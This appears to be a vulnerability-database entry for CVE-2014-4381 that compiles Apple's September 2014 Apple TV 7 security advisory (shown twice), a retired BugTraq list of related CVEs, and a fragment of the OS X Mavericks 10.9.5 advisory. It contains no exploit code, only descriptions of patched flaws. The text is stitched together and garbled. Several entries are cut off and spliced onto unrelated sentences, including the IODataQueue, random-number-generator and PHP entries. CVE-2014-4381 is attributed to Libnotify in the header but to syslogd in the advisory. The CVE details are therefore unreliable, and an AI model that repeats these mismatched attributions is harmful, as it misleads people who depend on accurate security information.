CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may be able
to cause a device to think that it is up to date even when it is not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
Apple TV
Available for: Apple TV 3rd generation and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization
CVE-ID
CVE-2014-4407 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Some kernel hardening measures may be bypassed
Description: The 'early' random number generator used in some kernel
hardening measures was not cryptographically secure, and some of its
output was exposed to user space, allowing bypass of the hardening
measures. This issue was addressed by replacing the random number
generator with a cryptographically secure algorithm, and using a
16-byte seed.
CVE-ID
CVE-2014-4422 : Tarjei Mandt of Azimuth Security
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGMh1AAoJEBcWfLTuOo7tSWgP/j19RyvhyRDhJJyBozeK/pN6
6pgKhW3R++yi3COOjYX9oGmupiDNlIz5Rd7pkZMxq+f6BbwBh+hzXoPDdHw33yRO
pQ9nV32gDIBlQRjvqmJgU/w6ODJWdPukcGBZqqjTjywce/tDxC9ZQBZLcRRuifXl
dQdCYmXpkIcyZ3Yh9uF6sSXy0vngZr7kvvyJnst4WTmjqF3X9Sak75/s8Xa4oLyg
naD+o2ITisuMk7dEmY6p1vqhbbQIxIeg315VyQxoGfsml9IPtOI5SWOPO+wi6nNd
PyHKTFuhmlqjE+tKdBLulBMQPNreF0bCP+iNipBtAUS8RUyR19dfkDDjJeBbcqp7
Lsl4+6XsXABKPjrj66pBl7M7NZR+9mRfJbr83gmDN7hXu2OZJ7PxH49UKmr7JkeK
OWlMyiyd4NfigtlasUTnom+Jky+uIDy/JYBGkumgoCG50cdt+BAQgb8CiPCS11LK
OX0Ra4X8juRxh9TajQ+afx6r5Ma0Zdhj+ONzGJaTCCV+/NVjSKb/o+MfxlSiRYBN
ot4R5cbQFHFDxcpMW+5S8EYt8mgUmn7oCxBm21mj9hzo9pqDVWTABaIUywI4+4n4
uWnZKxtit873cik8gE+NtbngtF3/q40n0Wvf3UzP6RTedl9g56wmjZ8NPvKWL8rE
vHsGbux+Eb0CYjDTQqqS
=98h5
-----END PGP SIGNATURE-----
| VAR-201409-0518 | CVE-2014-4381 | plural Apple In the product library root Vulnerability to execute arbitrary code with privileges |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Libnotify in Apple iOS before 8 and Apple TV before 7 lacks proper bounds checking on write operations, which allows attackers to execute arbitrary code as root via a crafted application.
An attacker can leverage this issue to execute arbitrary code with system privileges. Failed exploit attempts will likely result in denial-of-service conditions. Apple iOS and TV are prone to multiple security vulnerabilities. These issues affect the following components:
802.1X, Accounts, Accessibility, Accounts Framework, Address Book, App Installation, Assets, Bluetooth, CoreGraphics, Foundation, Home & Lock Screen, iMessage, IOAcceleratorFamily, IOAcceleratorFamily, IOHIDFamily, IOHIDFamily, IOKit, Kernel, Libnotify, Mail, Profiles, Safari, Sandbox Profiles, syslog and WebKit components.
Successfully exploiting these issues may allow attackers to crash the affected device, bypass security restrictions, obtain sensitive information, or execute arbitrary code. Other attacks are also possible.
This BID is being retired. The following individual records exist to better document the issues:
69913 Apple iOS and TV CVE-2014-4364 Spoofing Vulnerability
69917 Apple iOS CVE-2014-4423 Information Disclosure Vulnerability
69926 Apple iOS Lock Screen CVE-2014-4368 Security Bypass Vulnerability
69930 Apple iOS and TV CVE-2014-4357 Local Information Disclosure Security Vulnerability
69932 Apple iOS CVE-2014-4352 Local Information Disclosure Security Vulnerability
69936 Apple iOS CVE-2014-4386 Local Privilege Escalation Vulnerability
69940 Apple iOS CVE-2014-4384 Local Privilege Escalation Vulnerability
69941 Apple iOS and TV CVE-2014-4383 Security Bypass Vulnerability
69943 Apple iOS CVE-2014-4354 Unspecified Security Vulnerability
69903 Multiple Apple Products CVE-2014-4377 PDF Handling Integer Overflow Vulnerability
69915 Apple TV/Mac OS X/iOS CVE-2014-4378 Out of Bounds Read Memory Corruption Vulnerability
69905 Apple Mac OS X and iOS CVE-2014-4374 XML External Entity Information Disclosure Vulnerability
69921 Apple TV/Mac OS X/iOS CVE-2014-4379 Out of Bounds Read Memory Corruption Vulnerability
69929 Apple TV and iOS CVE-2014-4369 NULL Pointer Dereference Denial of Service Vulnerability
69934 Apple TV and iOS CVE-2014-4373 NULL Pointer Dereference Denial of Service Vulnerability
69938 Apple TV and iOS CVE-2014-4405 NULL Pointer Dereference Remote Code Execution Vulnerability
69942 Apple TV and iOS CVE-2014-4380 Out of Bounds Read Write Remote Code Execution Vulnerability
69947 Apple TV and iOS CVE-2014-4404 Heap Based Buffer Overflow Vulnerability
69949 Apple iOS CVE-2014-4361 Security Bypass Vulnerability
69951 Apple iOS CVE-2014-4353 Race Condition Local Information Disclosure Vulnerability
69912 Apple iOS and TV CVE-2014-4407 Information Disclosure Security Vulnerability
69919 Apple iOS and TV CVE-2014-4371 Unspecified Security Vulnerability
69924 Apple iOS and TV CVE-2014-4421 Unspecified Security Vulnerability
69927 Apple iOS and TV CVE-2014-4420 Unspecified Security Vulnerability
69928 Apple iOS and TV CVE-2014-4419 Unspecified Security Vulnerability
69939 Apple iOS and TV CVE-2014-4408 Out of Bounds Read Local Memory Corruption Vulnerability
69944 Apple iOS and TV CVE-2014-4375 Local Memory Corruption Vulnerability
69946 Apple iOS and TV CVE-2014-4418 Remote Code Execution Vulnerability
69948 Apple TV/Mac OS X/iOS CVE-2014-4388 Remote Code Execution Vulnerability
69950 Apple TV/Mac OS X/iOS CVE-2014-4389 Integer Buffer Overflow Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability
69911 Apple iOS and TV CVE-2014-4422 Security Bypass Vulnerability
69931 Apple TV/Mac OS X/iOS CVE-2014-4381 Arbitrary Code Execution Vulnerability
69914 Apple iOS CVE-2014-4366 Information Disclosure Vulnerability
69945 Apple iOS CVE-2014-4367 Security Vulnerability
69920 Apple iOS CVE-2014-4362 Information Disclosure Vulnerability
69922 Apple iOS CVE-2014-4356 Local Information Disclosure Vulnerability
69923 Apple iOS and TV CVE-2014-4372 Local Security Bypass Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-2 Apple TV 7
Apple TV 7 is now available and addresses the following:
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by removing support
for LEAP.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with access to an device may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may be able
to cause a device to think that it is up to date even when it is not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
Apple TV
Available for: Apple TV 3rd generation and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization
CVE-ID
CVE-2014-4407 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Some kernel hardening measures may be bypassed
Description: The 'early' random number generator used in some kernel
hardening measures was not cryptographically secure, and some of its
output was exposed to user space, allowing bypass of the hardening
measures. This issue was addressed by replacing the random number
generator with a cryptographically secure algorithm, and using a
16-byte seed. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJUGMh1AAoJEBcWfLTuOo7tSWgP/j19RyvhyRDhJJyBozeK/pN6
6pgKhW3R++yi3COOjYX9oGmupiDNlIz5Rd7pkZMxq+f6BbwBh+hzXoPDdHw33yRO
pQ9nV32gDIBlQRjvqmJgU/w6ODJWdPukcGBZqqjTjywce/tDxC9ZQBZLcRRuifXl
dQdCYmXpkIcyZ3Yh9uF6sSXy0vngZr7kvvyJnst4WTmjqF3X9Sak75/s8Xa4oLyg
naD+o2ITisuMk7dEmY6p1vqhbbQIxIeg315VyQxoGfsml9IPtOI5SWOPO+wi6nNd
PyHKTFuhmlqjE+tKdBLulBMQPNreF0bCP+iNipBtAUS8RUyR19dfkDDjJeBbcqp7
Lsl4+6XsXABKPjrj66pBl7M7NZR+9mRfJbr83gmDN7hXu2OZJ7PxH49UKmr7JkeK
OWlMyiyd4NfigtlasUTnom+Jky+uIDy/JYBGkumgoCG50cdt+BAQgb8CiPCS11LK
OX0Ra4X8juRxh9TajQ+afx6r5Ma0Zdhj+ONzGJaTCCV+/NVjSKb/o+MfxlSiRYBN
ot4R5cbQFHFDxcpMW+5S8EYt8mgUmn7oCxBm21mj9hzo9pqDVWTABaIUywI4+4n4
uWnZKxtit873cik8gE+NtbngtF3/q40n0Wvf3UzP6RTedl9g56wmjZ8NPvKWL8rE
vHsGbux+Eb0CYjDTQqqS
=98h5
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update
2014-004
OS X Mavericks 10.9.5 and Security Update 2014-004 are now available
and address the following:
apache_mod_php
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in PHP 5.4.24
Description: Multiple vulnerabilities existed in PHP 5.4.24, the
most serious of which may have led to arbitrary code execution. This issue was addressed through
always allocating the Global Descriptor Table at random addresses. This
issue was addressed through improved bounds checking
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
OpenSSL
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one
that may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in OpenSSL 0.9.8y.
This update was addressed by updating OpenSSL to version 0.9.8za